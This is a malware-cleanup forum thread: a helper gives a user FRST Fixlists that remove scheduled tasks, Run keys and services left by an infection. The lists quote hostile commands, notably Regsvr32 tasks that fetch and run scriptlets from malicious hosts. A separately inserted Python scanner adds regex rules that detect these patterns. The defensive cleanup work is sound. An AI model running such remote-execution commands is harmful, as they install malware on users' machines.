
Luckystarting - logi FRST

Agnesik 04 May 2017 20:42 546 8
  • #2 04 May 2017 20:57
    Kolobos
    Computer specialist

    Next to frst.exe, create a file named Fixlist.txt with the following content:
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) <==== UWAGA
    CustomCLSID: HKU\S-1-5-21-3315310686-3322874680-1150652724-1003_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Agnieszka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku
    Task: {16C75675-3534-434A-B87A-99321E5F19B6} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj88FUI8F8RWNYEdOTM4OWzLOUY1NWNSMdkyM8NLM8U4RF== scrobj.dll
    Task: {1A94F0C9-8829-4A78-9D0C-1E09763DA2CF} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {41FF5A8E-0588-455A-94AB-D36CF907DBE8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj88FUI8F8RWNYEdOTM4OWzLOUY1NWNSMdkyM8NLM8U4RF== scrobj.dll
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\Run: [background_fault] => "C:\Users\Agnieszka\AppData\Local\background_fault\aswRD.exe" "C:\Users\Agnieszka\AppData\Local\background_fault\bf.dll",background_fault_collector <===== UWAGA
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\Policies\system: [WallpaperStyle] 2
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\Policies\Explorer: [HideSCAHealth] 1
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    ShellIconOverlayIdentifiers: [SharingPrivate] -> {08244EE6-92F0-47f2-9FC9-929BAA2E7235} => -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [SharingPrivate] -> {08244EE6-92F0-47f2-9FC9-929BAA2E7235} => -> Brak pliku
    SearchScopes: HKLM -> DefaultScope - brak wartości
    SearchScopes: HKLM -> {F2996606-D7EC-4034-8FE9-272397BA49EE} URL = hxxp://slirsredirect.search.aol.com/slirs_http/sredir?sredir=1602&query={searchTerms}&invocationType=tb50hpcnnbie7-pl-pl
    SearchScopes: HKLM-x32 -> {F2996606-D7EC-4034-8FE9-272397BA49EE} URL = hxxp://slirsredirect.search.aol.com/slirs_http/sredir?sredir=1602&query={searchTerms}&invocationType=tb50hpcnnbie7-pl-pl
    SearchScopes: HKU\S-1-5-21-3315310686-3322874680-1150652724-1003 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    FF Extension: (Aktualizacja dodatku Adobe Flash) - C:\Users\Agnieszka\AppData\Roaming\Mozilla\Firefox\Profiles\namn8oyt.default\Extensions\dodatek@flash2.pl.xpi [2016-08-05]
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) <==== UWAGA
    S2 FirefoxDL; "C:\Users\AGNIES~1\AppData\Local\Temp\1\QQBrowser.exe" -isvc [X] <==== UWAGA
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    S2 WindowsOfficeSrv; C:\ProgramData\Microsoft\Office\PackageLocker.dll [X] <==== UWAGA
    R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-04-20] (Zemana Ltd.)
    S1 ZAM; \??\C:\WINDOWS\System32\drivers\zam64.sys [X]
    2017-05-04 19:12 - 2017-05-04 19:12 - 00012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe
    2017-05-04 18:22 - 2017-05-04 18:22 - 00000000 ____D C:\Users\Agnieszka\AppData\Roaming\Zoohair
    2017-05-04 18:19 - 2017-05-04 18:19 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-04 18:18 - 2017-05-04 18:18 - 00000000 ____D C:\Program Files (x86)\Zoohair
    2017-05-04 10:34 - 2017-05-04 10:47 - 00000000 ____D C:\ProgramData\HitmanPro
    2017-05-04 08:07 - 2017-05-04 08:07 - 00000000 ____D C:\Users\Agnieszka\AppData\Roaming\Google
    2017-05-03 17:49 - 2017-05-04 18:17 - 00003600 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-05-03 17:49 - 2017-05-04 15:49 - 00000000 ____D C:\WINDOWS\psgo
    2017-05-03 17:49 - 2017-05-03 17:49 - 00000000 _____ C:\WINDOWS\SysWOW64\33
    2017-05-03 17:49 - 2017-05-03 17:49 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
    2017-04-26 16:23 - 2017-05-04 20:28 - 00014482 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
    2017-04-26 16:23 - 2017-05-04 20:25 - 00100319 _____ C:\WINDOWS\ZAM.krnl.trace
    2017-04-26 15:01 - 2017-04-26 15:01 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-20 17:21 - 2017-05-04 20:27 - 00000000 ____D C:\Program Files (x86)\Zemana AntiMalware
    2017-04-20 17:21 - 2017-04-20 17:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
    2017-04-20 17:21 - 2017-04-20 17:21 - 00000000 ____D C:\Users\Agnieszka\AppData\Local\Zemana
    2017-04-20 17:16 - 2017-05-03 18:06 - 00000000 ____D C:\Users\Agnieszka\AppData\LocalLow\Mozilla
    2017-04-20 17:10 - 2017-05-04 18:52 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-20 17:10 - 2017-05-04 18:22 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-20 17:10 - 2017-05-03 17:49 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-20 17:10 - 2017-05-02 14:59 - 00000000 _____ C:\WINDOWS\SysWOW64\44
    2017-04-20 17:10 - 2017-04-20 17:10 - 00000000 ____D C:\Program Files (x86)\Everbean
    2017-04-20 17:05 - 2017-04-26 15:00 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-13 15:00 - 2017-04-13 15:01 - 00003696 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-13 14:59 - 2017-04-13 14:59 - 00000000 ____D C:\Users\Agnieszka\AppData\Roaming\SSMgre
    2017-04-10 10:30 - 2017-04-13 15:01 - 00003674 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    2017-04-26 16:24 - 2016-09-02 12:21 - 00000000 ____D C:\ProgramData\McAfee
    2013-01-31 17:10 - 2013-01-31 17:10 - 0000110 _____ () C:\Users\Agnieszka\AppData\Roaming\wklnhst.dat
    EmptyTemp:

    In FRST, click Fix (Napraw).

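One way to triage a log like this on the defender's side, as an added example that is not code from the thread, from FRST or from its author: a small Python scanner that runs a few rules over FRST-formatted lines (the sample lines below are constructed from the Fixlist in this post, shortened) and flags the kinds of entries the fix removes: scheduled tasks that run regsvr32 with a remote scriptlet, tasks that launch a PowerShell script, Run entries pointing into AppData, IFEO debugger keys, an Explorer policy hiding Security Center alerts, and services whose binary is missing. The rule names, the rule set and the functions `classify_line`, `scan_log` and `summarize` are assumptions of this example, not FRST features; the rules are review heuristics, not a verdict.

```python
from __future__ import annotations

import re

# Constructed sample in the format FRST writes: a few entries taken from the
# Fixlist posted above (URLs shortened), not a scan of any real machine.
SAMPLE_LOG = r"""
Task: {16C75675-3534-434A-B87A-99321E5F19B6} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlk scrobj.dll
Task: {1A94F0C9-8829-4A78-9D0C-1E09763DA2CF} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\Run: [background_fault] => "C:\Users\Agnieszka\AppData\Local\background_fault\aswRD.exe" "C:\Users\Agnieszka\AppData\Local\background_fault\bf.dll",background_fault_collector <===== UWAGA
HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\Policies\Explorer: [HideSCAHealth] 1
IFEO\taskmgr.exe: [Debugger]
S2 WindowsOfficeSrv; C:\ProgramData\Microsoft\Office\PackageLocker.dll [X] <==== UWAGA
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-04-20] (Zemana Ltd.)
2017-05-04 10:34 - 2017-05-04 10:47 - 00000000 ____D C:\ProgramData\HitmanPro
"""

# Hypothetical rule set for this example: (label, regex applied to one line).
# Each regex is written against the line layout FRST uses for that entry type.
RULES = [
    ("regsvr32 loading a remote scriptlet via scrobj.dll",
     re.compile(r"^Task:.*regsvr32\.exe.*/i:h(?:xx|tt)ps?://.*scrobj\.dll", re.I)),
    ("scheduled task launching a PowerShell script",
     re.compile(r"^Task:.*powershell(?:\.exe)?\b.*\.ps1", re.I)),
    ("Run autostart pointing into a user-writable AppData folder",
     re.compile(r"\\Run:\s*\[.*\\AppData\\(?:Local|Roaming)\\", re.I)),
    ("Explorer policy hiding Security Center notifications",
     re.compile(r"\\Policies\\Explorer:\s*\[HideSCAHealth\]\s*1", re.I)),
    ("Image File Execution Options debugger set on a system tool",
     re.compile(r"^IFEO\\[^:]+:\s*\[Debugger\]", re.I)),
    ("service registered but its binary is missing ([X])",
     re.compile(r"^[RS]\d\s+\S+;.*\[X\]", re.I)),
]


def classify_line(line: str) -> list[str]:
    """Return the label of every rule the given FRST line trips (empty if none)."""
    line = line.strip()
    return [label for label, pattern in RULES if pattern.search(line)]


def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Run every rule over every non-empty line and keep only flagged lines."""
    findings: list[tuple[str, list[str]]] = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        hits = classify_line(raw)
        if hits:
            findings.append((raw.strip(), hits))
    return findings


def summarize(findings: list[tuple[str, list[str]]]) -> dict[str, int]:
    """Count how often each rule fired, for a quick triage overview."""
    counts: dict[str, int] = {}
    for _, hits in findings:
        for label in hits:
            counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    for flagged, hits in scan_log(SAMPLE_LOG):
        print(f"[!] {'; '.join(hits)}\n    {flagged}")
    print(summarize(scan_log(SAMPLE_LOG)))
```

Run it against a saved FRST.txt with `scan_log(open("FRST.txt", encoding="utf-8").read())`; the two unflagged sample lines (the Zemana driver and the HitmanPro folder) show that legitimate security tooling present on the same machine passes through untouched, which is the behaviour you want before deciding what to put into a Fixlist.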
  • #4 04 May 2017 22:24
    Kolobos
    Computer specialist

    Also run this Fixlist.txt in FRST:
    (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    2017-04-26 16:23 - 2017-05-04 21:25 - 00000855 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
    2017-04-13 14:59 - 2017-03-30 12:39 - 00000000 ____D C:\Users\Agnieszka\AppData\Roaming\ScreenShot

    After running it, delete the C:\FRST folder and that's all.

  • #6 04 May 2017 23:01
    Kolobos
    Computer specialist

    In which browser?

  • #7 04 May 2017 23:11
    Agnesik
    Level 3

    Google Chrome

  • #9 07 May 2017 22:52
    Agnesik
    Level 3

    It looks like everything is OK. Thank you.
